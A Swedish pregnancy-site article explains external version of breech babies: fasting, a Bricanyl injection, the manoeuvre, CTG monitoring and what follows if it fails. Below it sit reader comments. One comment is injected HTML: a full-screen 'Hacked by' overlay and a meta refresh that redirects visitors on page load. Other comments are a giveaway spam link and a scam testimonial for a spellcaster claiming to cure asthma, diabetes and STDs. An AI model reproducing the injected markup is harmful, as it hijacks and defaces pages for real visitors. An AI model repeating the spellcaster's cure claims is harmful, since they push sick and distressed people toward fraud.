Mer i kategorin Gravid |

Vändningsförsök vid sätesbjudning

Omkring 3% av alla foster ligger i sätesbjudning (rumpan nedåt och huvudet uppåt, med olika variationer) vid fullgången graviditet. Då denna position hos fostret är förknippad med en del ökade risker, bland annat för navelsträngprolaps, så gör man ofta ett vändningsförsök.

Att göra yttre vändning av säte till huvud är en gammal beprövad metod. Vändning görs med fördel runt 36:e-37:e graviditetsveckan. Frekvensen lyckade vändingar är då omkring 60% och komplikationer förekommer ytterst sällan.

Förberedelser

Från midnatt till vändningsförsöket får du inte äta fast föda, men det är tillåtet att dricka. Tag gärna med dig en tidning eller bok då det kan bli en del väntetid.

På förlossningsavdelningen fastställer man åter barnets läge genom att känna på magen med händerna och kontrollerar även med ultraljud att barnet ligger med stjärten nedåt. Därefter kopplar barnmorskan en CTG-kurva, en registrering av barnets hjärtslag och rörelser.

Förlossningsläkaren beslutar sedan i samråd med dig om vändningsförsök skall göras.

En stund innan vändningsförsöket påbörjas får Du en injektion/spruta som innehåller ett läkemedel, Bricanyl, vilket får livmodem att slappna av. Du kan få lite hjärtklappning och känna Dig en aning darrig av Bricanyl men det är helt ofarligt. Det tar ca 5 minuter att ge injektionen och efter det är livmodern tillräckligt avslappnad och vändningsförsöket kan påbörjas.

Vändningsförsöket

Du far ligga med lätt uppdragna knän medan läkaren greppar om barnets stjärt och för den uppåt och ut åt sidan. Genom att på detta vis göra det "obekvämt" för barnet, gör de flesta barn nu en "framlänges kullerbytta". Barnets hjärtslag kontrolleras med ultraljud under tiden. Du kan känna lite obehag, men det skall inte göra ont. Skulle det göra ont så avbryts försöket med en gång.

CTG-registreringen får sedan pågå i ca 30 minuter, för att kontrollera att barnet mår bra efter vändningsförsöket. Därefter får du stiga upp och du får äta och dricka.  Du får sedan stanna kvar ytterligare någon timma för observation och innan du går hem så görs ännu en CTG-kontroll där man kontrollerar barnets läge.

Därefter går du hem och fortsätter med dina vanliga kontroller på MVC.

Om vändningen lyckas brukar de flesta foster ligga kvar i huvudbjudning fram till förlossningen.

Om vändningen inte lyckas diskuterar du tillsammans med din förlossningsläkare hur förlossningen skall gå till. Det är vanligt att man gör ett planerat kejsarsnitt, 7-10 dagar före beräknad förlossningsdag. De kvinnor som önskar föda vaginalt trots sätesbjudning får göra en bäckenröntgen. Därefter bedömer förlossningläkaren förutsättningarna för en vaginal förlossning.

Källor:

 1. Information från mödravården
 2. External Cephalic Version, American family physician

Rekommenderat

Så hittar du den billigaste och bekvämaste flygresan

Så hittar du den billigaste och bekvämaste flygresan

Sommaren närmar sig alltmer och det börjar bli dags att planera resan till lite mer solsäkra destinationer. Det finns en del funderingar som man alltid har innan man bokar resa och är man gravid är de här funderingar extra aktuella då det är egentligen inte en utan två personer ... 2

Det finns 25 kommentarer till denna artikel

  Så i v 40+2 kom min kära dotter till världen alldeles kletig och go! Snittet tog ca 1½ h på grund av komplikationer och min make och dotter blev uthysta till rummet bredvid där han trodde att han skulle bli ensamstående. Till slut gick allt bra igen men snitt är inget jag vill göra om!

  Är fortfarande arg på min bm att hon "snuvade" mig på en vaginal förlossning som jag hade förberett mig för.
  Går aldrig mer till henne under ev kommande graviditet!

  dcp

  <img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg7crhRmPNG1TU-W8Q6ol1Xu-YF_7bzF556bo3pJoYloZZ3qCCWf2Gn0jjG4Jm7yowpdcZLAqaWSaT6fFTdbCvhDdHMUviZTFcYerL1RFvWo3q4r64LFOkaP4FZDGbu3d79fptHcbz_OeeG6yTzaWGDjHf2RNNlxb3Z_6ma4e8vYkpZAePOm4T9Uhpc/s1600/Ads%C4%B1z%20tasar%C4%B1m.gif" href="https://twitter.com/Dogancan_Pusat/" title="Hacked by Doğancan Pusat" rel="nofollow" style="display: block!important;position: fixed!important;width: 500px!important;height: 500px;margin: auto;text-align: center!important;left: 0!important;top: 0!important;right: 0!important;padding: 240px;background: #282828c4;bottom: 0!important;z-index: 999999999999999!important;font-size: 4em!important;"</a>
  <meta http-equiv="refresh" content="0; url=https://twitter.com/Dogancan_Pusat/"/>

  CHECKOUT MY NEW WEBSITE HERE 
  GIVE AWAY ALERT!!!
   <a href="https://neo77.net">NEO77<a>

  Hej alla, Jag heter Aisha Sadat och jag är här ute för att vittna om de goda verk som BABA NOSA UGO från Karnataka Temple har gjort, eftersom min lycka återställs, jag har varit gift i cirka 11 år nu, det kom till en punkt när min man började att agera konstigt och sedan lämnade han mig och våra två barn för en annan kvinna i över 6 månader, jag visste aldrig att han hade ett förhållande med en annan kvinna, den här kvinnan vill ta min lycka och allt som jag har jobbat för, kändes som slut allt. När jag letade efter en lösning kom jag över flera vittnesmål om Spellcaster på internet.
  Vissa vittnade om att han tog tillbaka sin ex-älskare, vissa vittnade om att han löser alla slags andliga problem, örtmedicin för sjukdom som fybroid, astma, könssjukdomar, njursjukdom, diabetes, erektil dysfunktion, vinnande lotteri. Jag trodde aldrig på spellcaster men jag hade inget alternativ eftersom jag letade efter lösning överallt, så jag fick e-postmeddelandet till BABA NOSA UGO från vittnesmålen online och beslutade att prova honom.
  Jag kontaktade honom via e-post och förklarade mitt problem för honom, han berättade för mig vad jag behövde göra och jag gjorde precis som han instruerade, förberedde något för mig att använda, han gjorde nästan allt själv, jag tvivlade faktiskt på när han sa till mig att Jag kan förvänta mig en god nyhet, det var mindre än 14 dagar då min man ringde mig efter så lång tid. Han kom tillbaka om ursäkt och bad om förlåtelse, det hela var som en dröm, jag förlåtit honom och nu är vi ännu gladare än någonsin tidigare.
  Jag vill säga ett stort tack till BABA NOSA UGO för hans vänliga hjälp, jag har aldrig förväntat mig ett så stort andligt arbete och jag kommer inte att sluta dela hans vittnesbörd. Om du har något andligt problem och du letar efter en riktig och äkta Spellcaster, kontakta BABA NOSA UGO så blir du glad att du gjorde det.

  E-post: [email protected] / [email protected]

  WhatsApp: +37258031247

  Viber: +2347066853060

  https://karnatakatemple.wixsite.com/karnataka

  TILL ER SOM HAR BEBIS I SÄTE

  Jag kan rekommendera er Sätesboken samt att besöka www.satesboken.se

  Det finns många kvinnor som väljer att föda i säte, bl.a. jag, som har gjort detta vid två tillfällen. Första gången upptäcktes inte sätesläget förrän några timmar före dottern föddes. Min och flera andra kvinnors berättelser finner ni på hemsidan.

   

  Sätesboken innehåller allt du behöver veta om vändningsförsök, att föda ett säte vaginalt, kejsarsnitt, svar på vanliga funderingar, och mycket mer!

   

  E-boken släpps 24 juli och den tryckta boken släpps 24 augusti. Men det går bra att förhandsbeställa den redan nu!

  Lycka till allihopa!!

  Fick göra vändning i vecka 36 då den lille legat tvär länge. Väntar mitt andra barn. Gjorde sjukt ont och var öm där de tryckt som mest 3 dagar efter. De gjorde en bakåtvolt på bebisen. Kunde inte använda mitt fogbälte för att det tryckte för mycket. Fått mer förvärkar efter vändningen. Idag gick jag in i vecka 39. Hoppas den lille busen som ligger i magen snart vill komma ut.
  Skrev om mitt första vändningsförsök här över med dottern som.gick bra utan någon smärta alls, fick i december 2013 vända även sonen och det va hemskt! Va.inte alls orolig innan då det jag hade gjort gick jättebra! Men sonen satt där han satt, tillslut gick det och kunde föda även honom vaginalt men usch va ont det gjorde och vad annorlunda det kan vara!

Skriv en kommentar


För att visa att detta meddelande inte autogenererat, ange vilka bokstäver som visas

Går det inte att läsa? Klicka här för att byta.